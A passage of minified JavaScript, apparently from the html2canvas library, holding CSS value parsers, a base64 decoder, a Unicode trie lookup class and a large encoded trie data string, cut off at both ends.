ce.parse(fe,tt.parseComponentValue());case 1:return ce.parse(fe,tt.parseComponentValues());case 4:return tt.parseComponentValue();case 3:switch(ce.format){case"angle":return Bl_parse(fe,tt.parseComponentValue());case"color":return Hs_parse(fe,tt.parseComponentValue());case"image":return m0_parse(fe,tt.parseComponentValue());case"length":var _t=tt.parseComponentValue();return ws(_t)?_t:xo;case"length-percentage":var gt=tt.parseComponentValue();return In(gt)?gt:xo;case"time":return Pf.parse(fe,tt.parseComponentValue())}}},Of=function(fe,ce){var ge=function(fe){switch(fe.getAttribute("data-html2canvas-debug")){case"all":return 1;case"clone":return 2;case"parse":return 3;case"render":return 4;default:return 0}}(fe);return 1===ge||ce===ge},fl=function fe(ce,ge){this.context=ce,this.textNodes=[],this.elements=[],this.flags=0,Of(ge,3),this.styles=new lC(ce,window.getComputedStyle(ge,null)),Hi(ge)&&(this.styles.animationDuration.some(function(_e){return _e>0})&&(ge.style.animationDuration="0s"),null!==this.styles.transform&&(ge.style.transform="none")),this.bounds=Q(this.context,ge),Of(ge,4)&&(this.flags|=16)},dd="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",eh="undefined"==typeof Uint8Array?[]:new Uint8Array(256),ks=0;ks<dd.length;ks++)eh[dd.charCodeAt(ks)]=ks;for(var T_=function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint16Array(Array.prototype.slice.call(fe,ce,ge))},_l=function(){function fe(ce,ge,_e,je,tt,dt){this.initialValue=ce,this.errorValue=ge,this.highStart=_e,this.highValueIndex=je,this.index=tt,this.data=dt}return fe.prototype.get=function(ce){var ge;if(ce>=0){if(ce<55296||ce>56319&&ce<=65535)return this.data[ge=((ge=this.index[ce>>5])<<2)+(31&ce)];if(ce<=65535)return this.data[ge=((ge=this.index[2048+(ce-55296>>5)])<<2)+(31&ce)];if(ce<this.highStart)return ge=this.index[ge=2080+(ce>>11)],this.data[ge=((ge=this.index[ge+=ce>>5&63])<<2)+(31&ce)];if(ce<=1114111)return this.data[this.highValueIndex]}return this.errorValue},fe}(),R0="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",ah="undefined"==typeof Uint8Array?[]:new Uint8Array(256),$m=0;$m<R0.length;$m++)ah[R0.charCodeAt($m)]=$m;var Zd=8,ud=9,nh=11,Xm=12,fC=function(){for(var fe=[],ce=0;ce<arguments.length;ce++)fe[ce]=arguments[ce];if(String.fromCodePoint)return String.fromCodePoint.apply(String,fe);var ge=fe.length;if(!ge)return"";for(var _e=[],je=-1,tt="";++je<ge;){var dt=fe[je];dt<=65535?_e.push(dt):_e.push(55296+((dt-=65536)>>10),dt%1024+56320),(je+1===ge||_e.length>16384)&&(tt+=String.fromCharCode.apply(String,_e),_e.length=0)}return tt},ba=function(fe,ce){var ge=function(fe){var _e,tt,dt,_t,gt,ce=.75*fe.length,ge=fe.length,je=0;"="===fe[fe.length-1]&&(ce--,"="===fe[fe.length-2]&&ce--);var kt="undefined"!=typeof ArrayBuffer&&"undefined"!=typeof Uint8Array&&void 0!==Uint8Array.prototype.slice?new ArrayBuffer(ce):new Array(ce),Lt=Array.isArray(kt)?kt:new Uint8Array(kt);for(_e=0;_e<ge;_e+=4)tt=eh[fe.charCodeAt(_e)],dt=eh[fe.charCodeAt(_e+1)],_t=eh[fe.charCodeAt(_e+2)],gt=eh[fe.charCodeAt(_e+3)],Lt[je++]=tt<<2|dt>>4,Lt[je++]=(15&dt)<<4|_t>>2,Lt[je++]=(3&_t)<<6|63&gt;return kt}(fe),_e=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=4)ge.push(fe[_e+3]<<24|fe[_e+2]<<16|fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint32Array(ge),je=Array.isArray(ge)?function(fe){for(var ce=fe.length,ge=[],_e=0;_e<ce;_e+=2)ge.push(fe[_e+1]<<8|fe[_e]);return ge}(ge):new Uint16Array(ge),dt=T_(je,12,_e[4]/2),_t=2===_e[5]?T_(je,(24+_e[4])/2):function(fe,ce,ge){return fe.slice?fe.slice(ce,ge):new Uint32Array(Array.prototype.slice.call(fe,ce,ge))}(_e,Math.ceil((24+_e[4])/4));return new _l(_e[0],_e[1],_e[2],_e[3],dt,_t)}("AAAAAAAAAAAAEA4AGBkAAFAaAAACAAAAAAAIABAAGAAwADgACAAQAAgAEAAIABAACAAQAAgAEAAIABAACAAQAAgAEAAIABAAQABIAEQATAAIABAACAAQAAgAEAAIABAAVABcAAgAEAAIABAACAAQAGAAaABwAHgAgACIAI4AlgAIABAAmwCjAKgAsAC2AL4AvQDFAMoA0gBPAVYBWgEIAAgACACMANoAYgFkAWwBdAF8AX0BhQGNAZUBlgGeAaMBlQGWAasBswF8AbsBwwF0AcsBYwHTAQgA2wG/AOMBdAF8AekB8QF0AfkB+wHiAHQBfAEIAAMC5gQIAAsCEgIIAAgAFgIeAggAIgIpAggAMQI5AkACygEIAAgASAJQAlgCYAIIAAgACAAKBQoFCgUTBRMFGQUrBSsFCAAIAAgACAAIAAgACAAIAAgACABdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABoAmgCrwGvAQgAbgJ2AggAHgEIAAgACADnAXsCCAAIAAgAgwIIAAgACAAIAAgACACKAggAkQKZAggAPADJAAgAoQKkAqwCsgK6AsICCADJAggA0AIIAAgACAAIANYC3gIIAAgACAAIAAgACABAAOYCCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAkASoB+QIEAAgACAA8AEMCCABCBQgACABJBVAFCAAIAAgACAAIAAgACAAIAAgACABTBVoFCAAIAFoFCABfBWUFCAAIAAgACAAIAAgAbQUIAAgACAAIAAgACABzBXsFfQWFBYoFigWKBZEFigWKBYoFmAWfBaYFrgWxBbkFCAAIAAgACAAIAAgACAAIAAgACAAIAMEFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAMgFCADQBQgACAAIAAgACAAIAAgACAAIAAgACAAIAO4CCAAIAAgAiQAIAAgACABAAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAD0AggACAD8AggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIANYFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAMDvwAIAAgAJAIIAAgACAAIAAgACAAIAAgACwMTAwgACAB9BOsEGwMjAwgAKwMyAwsFYgE3A/MEPwMIAEUDTQNRAwgAWQOsAGEDCAAIAAgACAAIAAgACABpAzQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFOgU0BTUFNgU3BTgFOQU6BTQFNQU2BTcFOAU5BToFNAU1BTYFNwU4BTkFIQUoBSwFCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABtAwgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABMAEwACAAIAAgACAAIABgACAAIAAgACAC/AAgACAAyAQgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACACAAIAAwAAgACAAIAAgACAAIAAgACAAIAAAARABIAAgACAAIABQASAAIAAgAIABwAEAAjgCIABsAqAC2AL0AigDQAtwC+IJIQqVAZUBWQqVAZUBlQGVAZUBlQGrC5UBlQGVAZUBlQGVAZUBlQGVAXsKlQGVAbAK6wsrDGUMpQzlDJUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAZUBlQGVAfAKAAuZA64AtwCJALoC6ADwAAgAuACgA/oEpgO6AqsD+AAIAAgAswMIAAgACAAIAIkAuwP5AfsBwwPLAwgACAAIAAgACADRA9kDCAAIAOED6QMIAAgACAAIAAgACADuA/YDCAAIAP4DyQAIAAgABgQIAAgAXQAOBAgACAAIAAgACAAIABMECAAIAAgACAAIAAgACAD8AAQBCAAIAAgAGgQiBCoECAExBAgAEAEIAAgACAAIAAgACAAIAAgACAAIAAgACAA4BAgACABABEYECAAIAAgATAQYAQgAVAQIAAgACAAIAAgACAAIAAgACAAIAFoECAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAOQEIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAB+BAcACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEABhgSMBAgACAAIAAgAlAQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAwAEAAQABAADAAMAAwADAAQABAAEAAQABAAEAAQABHATAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAAMAAwADAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAdQMIAAgACAAIAAgACAAIAMkACAAIAAgAfQMIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACACFA4kDCAAIAAgACAAIAOcBCAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAIcDCAAIAAgACAAIAAgACAAIAAgACAAIAJEDCAAIAAgACADFAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABgBAgAZgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAbAQCBXIECAAIAHkECAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAJwEQACjBKoEsgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAC6BMIECAAIAAgACAAIAAgACABmBAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAxwQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAGYECAAIAAgAzgQIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAigWKBYoFigWKBYoFigWKBd0FXwUIAOIF6gXxBYoF3gT5BQAGCAaKBYoFigWKBYoFigWKBYoFigWKBYoFigXWBIoFigWKBYoFigWKBYoFigWKBYsFEAaKBYoFigWKBYoFigWKBRQGCACKBYoFigWKBQgACAAIANEECAAIABgGigUgBggAJgYIAC4GMwaKBYoF0wQ3Bj4GigWKBYoFigWKBYoFigWKBYoFigWKBYoFigUIAAgACAAIAAgACAAIAAgAigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWKBYoFigWLBf///////wQABAAEAAQABAAEAAQABAAEAAQAAwAEAAQAAgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAQADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAUAAAAFAAUAAAAFAAUAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUAAQAAAAUABQAFAAUABQAFAAAAAAAFAAUAAAAFAAUABQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAFAAUAAQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUABQAFAAAABwAHAAcAAAAHAAcABwAFAAEAAAAAAAAAAAAAAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAcABwAFAAUABQAFAAcABwAFAAUAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHAAAAAQABAAAAAAAAAAAAAAAFAAUABQAFAAAABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAcABwAHAAcAAAAHAAcAAAAAAAUABQAHAAUAAQAHAAEABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUABwABAAUABQAFAAUAAAAAAAAAAAAAAAEAAQABAAEAAQABAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABwAFAAUAAAAAAAAAAAAAAAAABQAFAAUABQAFAAUAAQAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABQANAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAEAAQABAAEAAQABAAEAAQABAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAABQAHAAUABQAFAAAAAAAAAAcABQAFAAUABQAFAAQABAAEAAQABAAEAAQABAAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABQAFAAUABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAFAAUAAAAFAAUABQAFAAUAAAAFAAUABQAAAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAAAAAAAAAAAAUABQAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAHAAUAAAAHAAcABwAFAAUABQAFAAUABQAFAAUABwAHAAcABwAFAAcABwAAAAUABQAFAAUABQAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABwAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAUABwAHAAUABQAFAAUAAAAAAAcABwAAAAAABwAHAAUAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAABQAFAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABwAHAAcABQAFAAAAAAAAAAAABQAFAAAAAAAFAAUABQAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUABQAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAFAAUABQAFAAUAAAAFAAUABwAAAAcABwAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAUABQAFAAUABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAFAAUABwAFAAUABQAFAAAAAAAHAAcAAAAAAA